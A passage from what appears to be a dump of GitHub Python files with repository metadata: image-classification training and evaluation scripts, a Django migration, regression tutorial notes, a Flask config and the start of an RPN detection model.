print('Recompute with `./tools/reval.py --matlab ...` for your paper.')
print('-- Thanks, The Management')
print('--------------------------------------------------------------')
def _do_matlab_eval(self, output_dir='output'):
print '-----------------------------------------------------'
print 'Computing results with the official MATLAB eval code.'
print '-----------------------------------------------------'
path = os.path.join(cfg.ROOT_DIR, 'lib', 'datasets',
'VOCdevkit-matlab-wrapper')
cmd = 'cd {} && '.format(path)
cmd += '{:s} -nodisplay -nodesktop '.format(cfg.MATLAB)
cmd += '-r "dbstop if error; '
cmd += 'voc_eval(\'{:s}\',\'{:s}\',\'{:s}\',\'{:s}\'); quit;"' \
.format(self._devkit_path, self._get_comp_id(),
self._image_set, output_dir)
print('Running:\n{}'.format(cmd))
status = subprocess.call(cmd, shell=True)
def dataset_eval(self):
annopath = os.path.join(
self._devkit_path,
'CelebA',
'Annotations',
'{:s}.xml')
imagesetfile = os.path.join(
self._devkit_path,
'CelebA',
'ImageSets',
'Main',
'trainval.txt')
cachedir = os.path.join(self._devkit_path, 'annotations_cache')
ratio_positive_array = np.zeros(len(self._face_attributes_name))
for i, attr in enumerate(self._face_attributes_name):
num_images, ratio_positive = dataset_eval(annopath, imagesetfile,
attr, cachedir)
ratio_positive_array[i] = ratio_positive
print('number of samples for {} = {:.4f}'.format(attr, num_images))
print('positive sample ratio for {} = {:.4f}'.format(attr, ratio_positive))
def evaluate_attributes(self, all_probs, output_dir):
self._write_celeba_results_file(all_probs)
self._do_python_eval(output_dir)
if self.config['matlab_eval']:
self._do_matlab_eval(output_dir)
if self.config['cleanup']:
for attr in self._face_attributes_name:
filename = self._get_celeba_results_file_template().format(attr)
os.remove(filename)
def competition_mode(self, on):
if on:
self.config['use_salt'] = False
self.config['cleanup'] = False
else:
self.config['use_salt'] = True
self.config['cleanup'] = True
if __name__ == '__main__':
from datasets.celeba import celeba
d = celeba('trainval')
res = d.roidb
from IPython import embed; embed()
| [
"503917315@qq.com"
] | 503917315@qq.com |
e4adfe56054c17345380d384b2475d55646b4b60 | 4921dd11c4cfe45d1d7cfab954c5cfcb4b124972 | /challenges/pattern.py | 67ca75485c13169df216cae7cc43e18eb537600a | [] | no_license | anay-jain/Machine-learning-in-python | 4708c78e876f143777878a3c87d4e26ade09bdf7 | 8b74c360e56130eb3d3a62532451d493f2455eaa | refs/heads/master | 2020-07-10T09:54:36.668861 | 2019-08-30T15:35:43 | 2019-08-30T15:35:43 | 204,235,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | try:
n=int(input())
except:
pass
for x in range(1,n+1):
print(x,end=" ")
print(end="\n")
for i in range(n-1):
for t in range (1,n-i):
print(t, end=" ")
print('* '*(i*2+1) , end=" ")
print(end="\n")
| [
"anayjain98@gmail.com"
] | anayjain98@gmail.com |
693985483ab6c80f3eb110cd22ba40936fa58935 | 7b3bfe08614802ef6b7046601a7c60aba5ed3aac | /Model/train_SAN.py | d02642f63b41e24ca47dbdce06f43c4cdab51a27 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | mapleinmount/SAT_for_image_classification_of_heavy_mineral_grains | 52c2335650397a9ec227398ba48e859cf6f4c4c2 | 081c6ab84cb9719fe71c59ba2c4c58eb3d030072 | refs/heads/main | 2023-07-13T19:28:49.077545 | 2021-08-06T07:31:34 | 2021-08-06T07:31:34 | 393,232,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,385 | py | import os
import random
import time
import cv2
import numpy as np
import logging
import argparse
import shutil
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.parallel
import torch.optim
import torch.utils.data
import torchvision
import torchvision.transforms as transforms
import torch.optim.lr_scheduler as lr_scheduler
import torch.multiprocessing as mp
import torch.distributed as dist
from tensorboardX import SummaryWriter
from util import config
from util.util import AverageMeter, intersectionAndUnionGPU, find_free_port, mixup_data, mixup_loss, smooth_loss, \
cal_accuracy
from SAN import SAN
from util.DomainImageFolder import DomainImageFolder
import random
import ttach as tta
cv2.ocl.setUseOpenCL(False)
cv2.setNumThreads(0)
def get_parser():
parser = argparse.ArgumentParser(description='Heavy Minerals Classification')
parser.add_argument('--config', type=str, default='config/imagenet/imagenet_san10_pairwise.yaml',
help='config file')
parser.add_argument('opts', help='see config/imagenet/imagenet_san10_pairwise.yaml for all options', default=None,
nargs=argparse.REMAINDER)
args = parser.parse_args()
assert args.config is not None
cfg = config.load_cfg_from_cfg_file(args.config)
if args.opts is not None:
cfg = config.merge_cfg_from_list(cfg, args.opts)
return cfg
def get_logger():
logger_name = "main-logger"
logger = logging.getLogger(logger_name)
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
fmt = "[%(asctime)s %(levelname)s %(filename)s line %(lineno)d %(process)d] %(message)s"
handler.setFormatter(logging.Formatter(fmt))
logger.addHandler(handler)
return logger
def worker_init_fn(worker_id):
random.seed(args.manual_seed + worker_id)
def main_process():
return not args.multiprocessing_distributed or (
args.multiprocessing_distributed and args.rank % args.ngpus_per_node == 0)
def main():
args = get_parser()
os.environ["CUDA_VISIBLE_DEVICES"] = ','.join(str(x) for x in args.train_gpu)
if args.manual_seed is not None:
random.seed(args.manual_seed)
np.random.seed(args.manual_seed)
torch.manual_seed(args.manualSeed)
torch.cuda.manual_seed(args.manualSeed)
torch.cuda.manual_seed_all(args.manualSeed)
cudnn.benchmark = False
cudnn.deterministic = True
if args.dist_url == "env://" and args.world_size == -1:
args.world_size = int(os.environ["WORLD_SIZE"])
args.distributed = args.world_size > 1 or args.multiprocessing_distributed
args.ngpus_per_node = len(args.train_gpu)
if len(args.train_gpu) == 1:
args.sync_bn = False
args.distributed = False
args.multiprocessing_distributed = False
if args.multiprocessing_distributed:
port = find_free_port()
args.dist_url = f"tcp://127.0.0.1:{port}"
args.world_size = args.ngpus_per_node * args.world_size
mp.spawn(main_worker, nprocs=args.ngpus_per_node, args=(args.ngpus_per_node, args))
else:
main_worker(args.train_gpu, args.ngpus_per_node, args)
def main_worker(gpu, ngpus_per_node, argss):
global args, best_acc1
args, best_acc1 = argss, 0
if args.distributed:
if args.dist_url == "env://" and args.rank == -1:
args.rank = int(os.environ["RANK"])
if args.multiprocessing_distributed:
args.rank = args.rank * ngpus_per_node + gpu
dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url, world_size=args.world_size,
rank=args.rank)
# model = torchvision.models.resnet18(pretrained=False, progress=True, num_classes=args.classes)
model = SAN()
criterion = nn.CrossEntropyLoss(ignore_index=args.ignore_label)
optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr=args.base_lr, momentum=args.momentum,
weight_decay=args.weight_decay)
optimizer1 = torch.optim.SGD(model.discriminator.parameters(), lr=args.base_lr, momentum=args.momentum,weight_decay=args.weight_decay)
# optimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=args.base_lr)
if args.scheduler == 'step':
scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=args.step_epochs, gamma=0.1)
elif args.scheduler == 'cosine':
scheduler = lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs)
if main_process():
global logger, writer
logger = get_logger()
writer = SummaryWriter(args.save_path)
# logger.info(args)
logger.info("=> creating model ...")
logger.info("Classes: {}".format(args.classes))
# logger.info(model)
if args.distributed:
torch.cuda.set_device(gpu)
args.batch_size = int(args.batch_size / ngpus_per_node)
args.batch_size_val = int(args.batch_size_val / ngpus_per_node)
args.workers = int((args.workers + ngpus_per_node - 1) / ngpus_per_node)
model = torch.nn.parallel.DistributedDataParallel(model.cuda(), device_ids=[gpu])
else:
model = torch.nn.DataParallel(model.cuda())
pth = torch.load("/deepo_data/GSP/heavy_minerals/output/CY/stage2/model_best.pth")
model.load_state_dict(pth['state_dict'])
if args.weight:
if os.path.isfile(args.weight):
if main_process():
logger.info("=> loading weight '{}'".format(args.weight))
checkpoint = torch.load(args.weight)
model.load_state_dict(checkpoint['state_dict'])
if main_process():
logger.info("=> loaded weight '{}'".format(args.weight))
else:
if main_process():
logger.info("=> no weight found at '{}'".format(args.weight))
if args.resume:
if os.path.isfile(args.resume):
if main_process():
logger.info("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage.cuda(gpu))
args.start_epoch = checkpoint['epoch']
best_acc1 = checkpoint['top1_val']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
scheduler.load_state_dict(checkpoint['scheduler'])
if main_process():
logger.info("=> loaded checkpoint '{}' (epoch {})".format(args.resume, checkpoint['epoch']))
else:
if main_process():
logger.info("=> no checkpoint found at '{}'".format(args.resume))
mean1, std1 = [0.385, 0.372, 0.36], [0.213, 0.215, 0.225]
mean2, std2 = [0.294, 0.353, 0.37], [0.192, 0.209, 0.227]
train_domain_folders = [ "/deepo_data/GSP/heavy_minerals/data/Yangtze/train",
"/deepo_data/GSP/heavy_minerals/data/YarlungZangbo/train",]
# "/deepo_data/GSP/heavy_minerals/data/PumQu/all"]
# val_domain_folders = ["/deepo_data/GSP/heavy_minerals/data/Yangtze/val",
# "/deepo_data/GSP/heavy_minerals/data/YarlungZangbo/val",
# "/deepo_data/GSP/heavy_minerals/data/PumQu/val"]
val_domain_folders = ["/deepo_data/GSP/heavy_minerals/data/PengQu/val"]
transform1 = transforms.Compose(
[transforms.Resize((256, 256)), transforms.RandomRotation(30), transforms.CenterCrop((224, 224)),
transforms.ToTensor(), transforms.Normalize(mean1, std1), torchvision.transforms.RandomErasing(p=0.3)])
transform2 = transforms.Compose(
[transforms.Resize((256, 256)), transforms.RandomRotation(30), transforms.CenterCrop((224, 224)),
transforms.ToTensor(), transforms.Normalize(mean2, std2), torchvision.transforms.RandomErasing(p=0.3)])
val_transform1 = transforms.Compose(
[transforms.Resize((256, 256)), transforms.RandomRotation(30), transforms.CenterCrop((224, 224)), transforms.ToTensor(), transforms.Normalize(mean1, std1)])
val_transform2 = transforms.Compose(
[transforms.Resize((256, 256)), transforms.RandomRotation(30), transforms.CenterCrop((224, 224)),transforms.ToTensor(), transforms.Normalize(mean2, std2)])
train_set = DomainImageFolder(train_domain_folders, transform1=transform1, transform2=transform2)
val_set = DomainImageFolder(val_domain_folders, transform1=val_transform1, transform2=val_transform2)
if args.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(train_set)
val_sampler = torch.utils.data.distributed.DistributedSampler(val_set)
else:
train_sampler = None
val_sampler = None
train_loader = torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=(train_sampler is None),
num_workers=args.workers, pin_memory=True, sampler=train_sampler)
val_loader = torch.utils.data.DataLoader(val_set, batch_size=args.batch_size_val, shuffle=False,
num_workers=args.workers, pin_memory=True, sampler=val_sampler)
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
loss_train, mIoU_train, mAcc_train, allAcc_train, top1_train, top5_train = train(train_loader, model, criterion,
optimizer, optimizer1, epoch)
loss_val, mIoU_val, mAcc_val, allAcc_val, top1_val, top5_val = validate(val_loader, model, criterion)
scheduler.step()
epoch_log = epoch + 1
if main_process():
writer.add_scalar('loss_train', loss_train, epoch_log)
writer.add_scalar('mIoU_train', mIoU_train, epoch_log)
writer.add_scalar('mAcc_train', mAcc_train, epoch_log)
writer.add_scalar('allAcc_train', allAcc_train, epoch_log)
writer.add_scalar('top1_train', top1_train, epoch_log)
writer.add_scalar('top5_train', top5_train, epoch_log)
writer.add_scalar('loss_val', loss_val, epoch_log)
writer.add_scalar('mIoU_val', mIoU_val, epoch_log)
writer.add_scalar('mAcc_val', mAcc_val, epoch_log)
writer.add_scalar('allAcc_val', allAcc_val, epoch_log)
writer.add_scalar('top1_val', top1_val, epoch_log)
writer.add_scalar('top5_val', top5_val, epoch_log)
if (epoch_log % args.save_freq == 0) and main_process():
filename = args.save_path + '/train_epoch_' + str(epoch_log) + '.pth'
logger.info('Saving checkpoint to: ' + filename)
torch.save({'epoch': epoch_log, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict(),
'scheduler': scheduler.state_dict(), 'top1_val': top1_val, 'top5_val': top5_val}, filename)
if top1_val > best_acc1:
best_acc1 = top1_val
shutil.copyfile(filename, args.save_path + '/model_best.pth')
if epoch_log / args.save_freq > 2:
deletename = args.save_path + '/train_epoch_' + str(epoch_log - args.save_freq * 2) + '.pth'
os.remove(deletename)
def train(train_loader, model, criterion, optimizer, optimizer1, epoch):
batch_time = AverageMeter()
data_time = AverageMeter()
loss_meter = AverageMeter()
intersection_meter = AverageMeter()
union_meter = AverageMeter()
target_meter = AverageMeter()
top1_meter = AverageMeter()
top5_meter = AverageMeter()
criterion1 = nn.CrossEntropyLoss()
model.train()
end = time.time()
max_iter = args.epochs * len(train_loader)
for i, (input, target, domain) in enumerate(train_loader):
data_time.update(time.time() - end)
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
domain = domain.cuda(non_blocking=True)
if args.mixup_alpha:
eps = args.label_smoothing if args.label_smoothing else 0.0
input, target_a, target_b, lam = mixup_data(input, target, args.mixup_alpha)
input, domain_a, domain_b, lam = mixup_data(input, domain, args.mixup_alpha)
output, output_domain = model(input)
loss = mixup_loss(output, target_a, target_b, lam, eps)
else:
output, output_domain = model(input)
if args.label_smoothing:
# loss = smooth_loss(output, target, args.label_smoothing)
loss = smooth_loss(output, target, args.label_smoothing) + criterion1(output_domain, domain).mean()
# loss = criterion1(output_domain, domain)
else:
# loss = criterion(output, target).mean()
loss = criterion(output, target) + criterion1(output_domain, domain)
# loss = criterion1(output_domain, domain)
# loss2 = -criterion1(output_domain, domain)
optimizer.zero_grad()
loss.backward() #retain_graph=True
optimizer1.zero_grad()
for i in range(5):
output, output_domain = model(input)
loss2 = - 0.3 * criterion1(output_domain, domain).mean()
loss2.backward()
optimizer1.step()
optimizer.step()
top1, top5 = cal_accuracy(output, target, topk=(1, 5))
n = input.size(0)
if args.multiprocessing_distributed:
with torch.no_grad():
loss, top1, top5 = loss.detach() * n, top1 * n, top5 * n
count = target.new_tensor([n], dtype=torch.long)
dist.all_reduce(loss), dist.all_reduce(top1), dist.all_reduce(top5), dist.all_reduce(count)
n = count.item()
loss, top1, top5 = loss / n, top1 / n, top5 / n
loss_meter.update(loss.item(), n), top1_meter.update(top1.item(), n), top5_meter.update(top5.item(), n)
output = output.max(1)[1]
intersection, union, target = intersectionAndUnionGPU(output, target, args.classes, args.ignore_label)
if args.multiprocessing_distributed:
dist.all_reduce(intersection), dist.all_reduce(union), dist.all_reduce(target)
intersection, union, target = intersection.cpu().numpy(), union.cpu().numpy(), target.cpu().numpy()
intersection_meter.update(intersection), union_meter.update(union), target_meter.update(target)
accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)
batch_time.update(time.time() - end)
end = time.time()
# calculate remain time
current_iter = epoch * len(train_loader) + i + 1
remain_iter = max_iter - current_iter
remain_time = remain_iter * batch_time.avg
t_m, t_s = divmod(remain_time, 60)
t_h, t_m = divmod(t_m, 60)
remain_time = '{:02d}:{:02d}:{:02d}'.format(int(t_h), int(t_m), int(t_s))
if ((i + 1) % args.print_freq == 0) and main_process():
logger.info('Epoch: [{}/{}][{}/{}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}) '
'Remain {remain_time} '
'Loss {loss_meter.val:.4f} '
'Accuracy {accuracy:.4f} '
'Acc@1 {top1.val:.3f} ({top1.avg:.3f}) '
'Acc@5 {top5.val:.3f} ({top5.avg:.3f}).'.format(epoch + 1, args.epochs, i + 1,
len(train_loader),
data_time=data_time,
batch_time=batch_time,
remain_time=remain_time,
loss_meter=loss_meter,
accuracy=accuracy,
top1=top1_meter,
top5=top5_meter))
if main_process():
writer.add_scalar('loss_train_batch', loss_meter.val, current_iter)
writer.add_scalar('mIoU_train_batch', np.mean(intersection / (union + 1e-10)), current_iter)
writer.add_scalar('mAcc_train_batch', np.mean(intersection / (target + 1e-10)), current_iter)
writer.add_scalar('allAcc_train_batch', accuracy, current_iter)
writer.add_scalar('top1_train_batch', top1, current_iter)
writer.add_scalar('top5_train_batch', top5, current_iter)
iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)
accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)
mIoU = np.mean(iou_class)
mAcc = np.mean(accuracy_class)
allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)
if main_process():
logger.info(
'Train result at epoch [{}/{}]: mIoU/mAcc/allAcc/top1/top5 {:.4f}/{:.4f}/{:.4f}/{:.4f}/{:.4f}.'.format(
epoch + 1, args.epochs, mIoU, mAcc, allAcc, top1_meter.avg, top5_meter.avg))
return loss_meter.avg, mIoU, mAcc, allAcc, top1_meter.avg, top5_meter.avg
def validate(val_loader, model, criterion):
if main_process():
logger.info('>>>>>>>>>>>>>>>> Start Evaluation >>>>>>>>>>>>>>>>')
batch_time = AverageMeter()
data_time = AverageMeter()
loss_meter = AverageMeter()
intersection_meter = AverageMeter()
union_meter = AverageMeter()
target_meter = AverageMeter()
top1_meter = AverageMeter()
top5_meter = AverageMeter()
test_time_transforms = tta.Compose(
[
tta.HorizontalFlip(),
# tta.VerticalFlip(),
# tta.Rotate90(angles=[0, 90, 180]),
]
)
model.eval()
end = time.time()
for i, (input, target, domain) in enumerate(val_loader):
data_time.update(time.time() - end)
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
domain = domain.cuda(non_blocking=True)
tta_outputs = []
for transformer in test_time_transforms:
augmented_image = transformer.augment_image(input)
with torch.no_grad():
output, output_domain = model(augmented_image)
tta_outputs.append(output.detach().cpu().numpy().tolist())
output = np.mean(tta_outputs, axis=0)
output = torch.tensor(output).cuda(non_blocking=True)
loss = criterion(output, target)
output, output_domain = model(input)
loss = criterion(output, target)
top1, top5 = cal_accuracy(output, target, topk=(1, 5))
n = input.size(0)
if args.multiprocessing_distributed:
with torch.no_grad():
loss, top1, top5 = loss.detach() * n, top1 * n, top5 * n
count = target.new_tensor([n], dtype=torch.long)
dist.all_reduce(loss), dist.all_reduce(top1), dist.all_reduce(top5), dist.all_reduce(count)
n = count.item()
loss, top1, top5 = loss / n, top1 / n, top5 / n
loss_meter.update(loss.item(), n), top1_meter.update(top1.item(), n), top5_meter.update(top5.item(), n)
output = output.max(1)[1]
intersection, union, target = intersectionAndUnionGPU(output, target, args.classes, args.ignore_label)
if args.multiprocessing_distributed:
dist.all_reduce(intersection), dist.all_reduce(union), dist.all_reduce(target)
intersection, union, target = intersection.cpu().numpy(), union.cpu().numpy(), target.cpu().numpy()
intersection_meter.update(intersection), union_meter.update(union), target_meter.update(target)
accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % args.print_freq == 0) and main_process():
logger.info('Test: [{}/{}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}) '
'Loss {loss_meter.val:.4f} ({loss_meter.avg:.4f}) '
'Accuracy {accuracy:.4f} '
'Acc@1 {top1.val:.3f} ({top1.avg:.3f}) '
'Acc@5 {top5.val:.3f} ({top5.avg:.3f}).'.format(i + 1, len(val_loader),
data_time=data_time,
batch_time=batch_time,
loss_meter=loss_meter,
accuracy=accuracy,
top1=top1_meter,
top5=top5_meter))
iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)
accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)
mIoU = np.mean(iou_class)
mAcc = np.mean(accuracy_class)
allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)
if main_process():
logger.info(
'Val result: mIoU/mAcc/allAcc/top1/top5 {:.4f}/{:.4f}/{:.4f}/{:.4f}/{:.4f}.'.format(mIoU, mAcc, allAcc,
top1_meter.avg,
top5_meter.avg))
for i in range(args.classes):
logger.info('Class_{} Result: iou/accuracy {:.4f}/{:.4f}.'.format(i, iou_class[i], accuracy_class[i]))
logger.info('<<<<<<<<<<<<<<<<< End Evaluation <<<<<<<<<<<<<<<<<')
return loss_meter.avg, mIoU, mAcc, allAcc, top1_meter.avg, top5_meter.avg
if __name__ == '__main__':
main()
| [
"cbjg395@gmail.com"
] | cbjg395@gmail.com |
35e280fd151a401ebfceaf55c144d82f9cf6005d | 9981ca5a21e4187a74e57320bc138b1c46dabe45 | /parroquialista/migrations/0001_initial.py | 056ef2ec6d824c30f2a50bf22275a3e647b982cd | [] | no_license | ceag235/ParroquiaWeb | f3c44760d090ed085b02a580b8cee5219f385b1b | 72d050ffe0ac729de6e9f95f2310c0a85a2da577 | refs/heads/master | 2021-09-02T10:21:31.062116 | 2018-01-01T21:04:45 | 2018-01-01T21:04:45 | 115,822,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 743 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2017-12-01 20:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Parroquia',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=200)),
('direccion', models.CharField(max_length=200)),
('latitud', models.CharField(max_length=20)),
('longitud', models.CharField(max_length=20)),
],
),
]
| [
"cesar.acosta@gmail.com"
] | cesar.acosta@gmail.com |
7032f31c624cbe3832c6516d669ce2246a315b3b | cfc36873e9e166212d15add1b7c79610f956968c | /multiplelinearregression1.py | 5bf2b0423c9fcf3b4bbe6857e6d788d24a77d8f4 | [] | no_license | BaluAnush18/Machine-Learning-Basics | 8727f4ea7dfdae8064793a526de9c48aeda1596a | 1ec7e9f6d32b00b978d452f3a0866c5bbd490976 | refs/heads/main | 2023-05-13T23:07:48.642036 | 2021-05-25T08:44:52 | 2021-05-25T08:44:52 | 370,621,290 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,154 | py | #SAME AS LINEAR REGRESSION BUT HAS MANY COMBINATIONS OF b & x.
#LINEAR REGRESSION -> y = b0 + b1*x1
#MULTIPLE REGRESSION -> y = b0 + b1*x1 + b2*x2 + b3*x3 + bn*xn
#ASSUMPTIONS OF LINEAR REGRESSION:
#Linearity, Homoscedasticity, Multivariate Normality, Independence of Errors, Lack of Multicollinearity.
#DUMMY VARIABLES:
#In this case, Profit is the dependent variable. So b0 is profit.
#b1*x1 -> R&D Spend ; b2*x2 -> Admin ; b3*x3 -> Marketing ; But problem arises when we encounter a categorical varibles.
#To overcome categorical variable problem, we need to create a dummy variable.
#Eg: For values in NY column, put 1 -> present & 0 elsewhere. Similarly, for California put 1 -> present & 0 where it is absent.
#So regression equation becomes b4*D1 (name of Dummy variable column).
#DUMMY VARIABLE TRAP:
#We cannot include 2 dummy variable at the same time.
#Because we are basically duplicating the variables. This is because D2 = 1 - D1.
#The phenomenon where one or more variables predict another -> Multiple Linearity.
#As a result, the model cannot distinguish between dummy variables and results in dummy variable trap.
#And also we cannot include a constant(b0) and both the dummy variables at the same time in the same equation.(Refer math)
#STASTICAL SIGNIFICANCE:
#H0 : This is a fair coin ; H1 : This is not a fair coin.
#Suppose we flip the coin and get tail continuously, the probablity of getting a tail everytime is 0.5 -> 0.25 -> 0.12 -> 0.06 -> 0.03 -> 0.01.
#Suppose we do this for 33 days, there is a rare chance of us getting the above combination.
#We are assuming the hypothesis is true in the given universe.
#The combination is called P-Value.
#We get the P-Value in H0 is 0.5 -> 0.25 -> 0.12 -> 0.06 -> 0.03 -> 0.01.
#But in H1 the values would be 100%.
#We assume that we are getting an uneasy feeling and feeling suspicious about out model. This value is alpha and we assume it be 0.05 in our case.
#Once the value goes below alpha, it is unlikely to see this random and it is unlikely to happen, it is right to reject that hypothesis.
#P-Value depends on experiment and results. Ideally it is set to 95%.
#BUILDING A MODEL:
#5 methods: All-in, Backward Elimination, Forward Selection, Bi-directional Elimination, Score Comparison.
#Step wise regression -> Backward Elimination, Forward Selection, Bi-directional Elimination. (default : Bi-directional Elimination).
#All-in : To let all the variables in once you are sure that all the variables are true to your knowledge.
#Backward Elimination :
# Steps ->
# 1. Select a significance level to stay in the model.
# 2. Fit the full model with all possible predictors.
# 3. Consider the predictor with highest P-Value. If P > SL -> Step 4. Else FIN. (FIN -> Finish. Model is ready)
# 4. Remove the predictor.
# 5. Fit the model without this variable. Repeat till P > SL fails.
#Forward Elimination :
# 1. Select a significance level to enter the model.
# 2. Fit all the simple regression models y ~ xn. Select the one with lowest P-Value.
# 3. Keep this variable and fit all the possible models with one extra predictor added to one(s) you already have.
# 4. Consider the predictor with lowest P-Value. If P < SL, goto step 3, otherwise FIN.(FIN -> Keep a step back).
#Bi-directional Elimination:
# 1. Select a significance level to enter and to stay in the model.
# 2. Perform the next step of Forward Selection. (New variables must have: P < SLENTER to enter).
# 3. Perform all steps of Backward Elimination. (Old variables must have: P < SLSTAY to stay).
# 4. Keep repeating until you cannot eliminate a variable or add. No new variables can enter and no old variables can exit. FIN.
#Score Comparison:
# 1. Select a criterion of goodness and fit.
# 2. Construct all possible regression models.((2^n)-1) total combinations.
# 3. Select the one with best criterion. FIN.
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
dataset = pd.read_csv('50_Startups.csv')
x = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder
ct = ColumnTransformer( transformers= [('encoding', OneHotEncoder(), [3])],remainder='passthrough' )
x=np.array(ct.fit_transform(x))
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)
#In Multiple Linear Regression, there is no need to apply a feature scaling as the coefficient terms such as b1, b2 will compensate and come on the same scale.
from sklearn.linear_model import LinearRegression #will by default choose the best P-Model and will return it.
regression=LinearRegression()
regression.fit(x_train,y_train)
y_pred = regression.predict(x_test)
np.set_printoptions(precision=2)
print(np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),1))
#To display the real profits and predicted profits, we use concatenate which concats either vertically or horizontally.
#1->concat horizontally. 0->vertically | [
"noreply@github.com"
] | noreply@github.com |
f839f9696b4fbf844d94d553f489d414e67a92e9 | 098ae2441ad0bbdb79212ee7462c8b522fcdaa07 | /config.py | c1db2b09a49c43b942e56bacd9ff1ef98133a65c | [] | no_license | liuwar/fg_show_web | 9e8db73f1b6c5b0fff98b9b8f76f8b3bbaa0cb0b | 772b54fe6fd4256af97177ea83aab2716db42b70 | refs/heads/main | 2023-04-29T07:24:09.589821 | 2021-05-19T02:18:22 | 2021-05-19T02:18:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,626 | py | from os import path
class Config:
SECRET_KEY = ''
#DATABASE
SQLALCHEMY_DATABASE_URI = ''
SQLALCHEMY_TRACK_MODIFICATIONS = False
#UP_LOAD
MAX_CONTENT_LENGTH = 10 * 1024 * 1024
UPLOADED_IMAGEFILES_DEST = path.join(path.dirname(path.abspath(__file__))),"/app/static/image"
DEBUG = True
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = ""
REDIS_URL = ""
class DevelopmentConfig(Config):
SQLALCHEMY_DATABASE_URI = ""
config = {
"development": DevelopmentConfig,
"test":ProductionConfig,
"product":ProductionConfig,
'default':DevelopmentConfig
}
classify = {
0:{
"title":"不限",
"active":"",
"code":'0'
},
155:{
"title":"时尚",
"active":"",
"code":'155'
},
160:{
"title":"生活",
"active":"",
"code":'160'
},
1:{
"title":"动画",
"active":"",
"code":'1'
},
3:{
"title":"音乐",
"active":"",
"code":'3'
},
129:{
"title":"舞蹈",
"active":"",
"code":'129'
},
4:{
"title":"游戏",
"active":"",
"code":'4'
},
36:{
"title":"知识",
"active":"",
"code":'36'
},
188:{
"title":"数码",
"active":"",
"code":'188'
},
202:{
"title":"咨询",
"active":"",
"code":'202'
},
119:{
"title":"鬼畜",
"active":"",
"code":'119'
},
165:{
"title":"广告",
"active":"",
"code":'165'
},
5:{
"title":"娱乐",
"active":"",
"code":'5'
},
181:{
"title":"影视",
"active":"",
"code":'181'
},
13:{
"title":"番剧",
"active":"",
"code":'13'
},
167:{
"title":"国创",
"active":"",
"code":'167'
},
177:{
"title":"纪录片",
"active":"",
"code":'177'
},
23:{
"title":"电影",
"active":"",
"code":'23'
},
11:{
"title":"电视剧",
"active":"",
"code":'11'
},
} | [
"572179341@qq.com"
] | 572179341@qq.com |
bea94d93e49502d92c4c31df5a75a23b238d7292 | b67d739367a6789c01be22f169498fbda1dcbbc3 | /models/rpn.py | 590d039d7835d14df06cd4bd5197e9c0bb864093 | [] | no_license | luoyi9340/faster_rcnn | e5ac6e68283bfb7a5b3c7d25160490269f030e03 | 8d0c6960f54404cb0a19872a44a94a57d9961108 | refs/heads/master | 2023-03-03T00:37:30.566775 | 2021-02-16T03:18:47 | 2021-02-16T03:18:47 | 327,672,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,674 | py | # -*- coding: utf-8 -*-
'''
RPN模型
@author: luoyi
Created on 2021年1月5日
'''
import tensorflow as tf
import models
import utils.conf as conf
from models.layers.rpn.models import RPNNet
from models.layers.rpn.losses import RPNLoss
from models.layers.rpn.metrics import RPNMetricCls, RPNMetricReg
from models.layers.rpn.preprocess import takeout_sample_array, all_positives_from_fmaps
from models.layers.rpn.nms import nms
from models.layers.resnet.models import ResNet34, ResNet50
# RPN模型
class RPNModel(models.AModel):
def __init__(self,
cnns=None,
cnns_name=conf.RPN.get_cnns(),
rpn=None,
learning_rate=conf.RPN.get_train_learning_rate(),
scaling=conf.CNNS.get_feature_map_scaling(),
K=conf.ROIS.get_K(),
cnns_base_channel_num=conf.CNNS.get_base_channel_num(),
